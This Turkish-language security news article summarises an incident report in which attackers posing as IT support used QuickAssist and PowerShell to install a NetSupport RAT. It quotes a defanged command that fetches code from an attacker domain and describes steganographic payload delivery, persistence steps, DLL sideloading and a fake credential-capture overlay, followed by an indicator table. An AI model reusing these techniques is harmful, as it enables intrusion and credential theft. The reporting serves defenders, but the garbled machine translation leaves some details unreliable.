.webp?w=696&resize=696,0&ssl=1 "300 saniyede hacklendi")
Tehdit aktörleri, sosyal mühendislik taktikleri ve hızlı PowerShell infazının bir kombinasyonunu kullanarak kurumsal sistemleri sadece beş dakika içinde başarılı bir şekilde tehlikeye attı.
NCC Group’un Dijital Adli Tıp ve Olay Yanıtı (DFIR) ekibi tarafından araştırılan olay, siber suçluların geleneksel güvenlik önlemlerini atlamak için güvenilir iş uygulamalarını nasıl silahlandırdığını gösteriyor.
Key Takeaways
1. Hackers impersonated IT support to gain QuickAssist remote access and compromised it in under 5 minutes.
2. Deployed NetSupport Manager RAT.
3. Legitimate tools weaponized through social engineering, requiring better user training.
Hızlı Saldırı: 300 saniyelik uzlaşma
Tehdit oyuncusu, BT destek personelini taklit ederek yaklaşık yirmi kullanıcıyı hedefleyen dikkatle düzenlenmiş bir kampanya yürüttü.
İki kurbanı uzaktan erişim sağlamaya ikna eden saldırganlar, Windows’un yerli QuickAssist.exe uzaktan destek aracını ilk dayanağı oluşturmak için kullandı.
Erişim kazandıktan sonra 300 saniye içinde, rakipler hücum araçlarını indiren ve birden fazla kalıcılık mekanizması oluşturan bir dizi PowerShell komutu kullandılar.
Saldırı dizisi, komutu kullanarak pano manipülasyonu ile başladı (curl hxxps: // resutato[.]com/2-4.txt) .Content | Set-Clipboard, ardından gizlenmiş Powershell komut dosyalarının yürütülmesi raporu okur.
Birincil yük indirimi, kötü amaçlı kodun HXXPS: // Resutato adresinde barındırılan bir JPEG dosyasına gömüldüğü sofistike bir steganografik teknikle gerçekleşti.[.]com/b2/res/nh2.jpg.
Komut dosyası, “nethealth” yazılımı olarak gizlenmiş Netsupport yöneticisi bileşenlerini içeren bir fermuar arşivini çıkarmak ve yeniden inşa etmek için 4 baytlık bir işaretleyici (0x31, 0x67, 0xbe, 0xe1) ile XOR şifrelemesini kullandı.
Kimlik bilgisi hasat
Saldırganlar, birden fazla kalıcılık mekanizması uygulayarak gelişmiş tradecraft gösterdiler.
Randomize DLL adları ile regsvr32.exe kullanarak her beş dakikada bir yürütülecek şekilde yapılandırılmış zamanlanmış görevler oluşturdular ve HKCU \ Microsoft \ Windows \ CurrentVersion \ Run \ Nethealth aracılığıyla HKCU \ Software \ Software \ Software aracılığıyla yerleşik kayıt defteri kalıcılığı oluşturdu.
Kötü amaçlı yazılım, Msiexec.exe ve Genup.exe gibi meşru ikili dosyaları, DLL yan yükleme saldırıları için kullandı ve truva atık Libcurl.dll bileşenini dağıttı.
Belki de en önemlisi, meşru sistem kimlik doğrulama istemlerini taklit eden sofistike bir kimlik bilgisi hasat GUI’sinin konuşlandırılmasıydı.
PowerShell tabanlı arabirim (c: \ users \ {username} \ VideoS \ l.ps1), $ env: temp \ cred.txt’e düz metin kimlik bilgilerini yakalayan ikna edici bir “sistem kimlik bilgisi doğrulaması” iletişim kutusuyla tam ekran bir kaplama oluşturdu.
Arayüz, kullanıcı kaçışını önlemek için görev çubuğu erişimi ve çeşitli klavye kısayolları dahil kritik Windows işlevlerini devre dışı bıraktı.
Komuta ve Kontrol İletişimi, resutato dahil olmak üzere birden çok alan ile kuruldu[.]com ve nimbusvaults[.]com, uzaktan yönetim özelliklerini etkinleştirme.
Saldırının başarısı, kısa güvenlik ihlalleri bile önemli bir organizasyonel uzlaşmaya neden olabileceğinden, gelişmiş kullanıcı farkındalığı eğitimi ve sağlam olay müdahale yeteneklerine yönelik kritik ihtiyacın altını çiziyor.
| Değer | Tip | Yorum |
|---|---|---|
resutato[.]com |
İhtisas | Komut ve Kontrol |
hxxps://resutato[.]com/b2/st/st[.]php |
Url | Komut ve Kontrol + Kötü Yazılım İndir |
hxxps://resutato[.]com/2-4.txt |
Url | Kötü amaçlı yazılım indir |
hxxp://196.251.69[.]195 |
Url | Kötü amaçlı yazılım indir |
196.251.69[.]195 |
IP adresi | Kötü amaçlı yazılım indir |
4e57ae0cc388baffa98dd755ac77ee3ca70f2eaa |
SHA1 | libcurl.dll |
df3125365d72abf965368248295a53da1cdceabe |
SHA1 | Update.msi |
SOC’nizi en son tehdit verilerine tam erişimle donatın Herhangi biri. Olay yanıtı iyileştirebilir -> 14 günlük ücretsiz deneme alın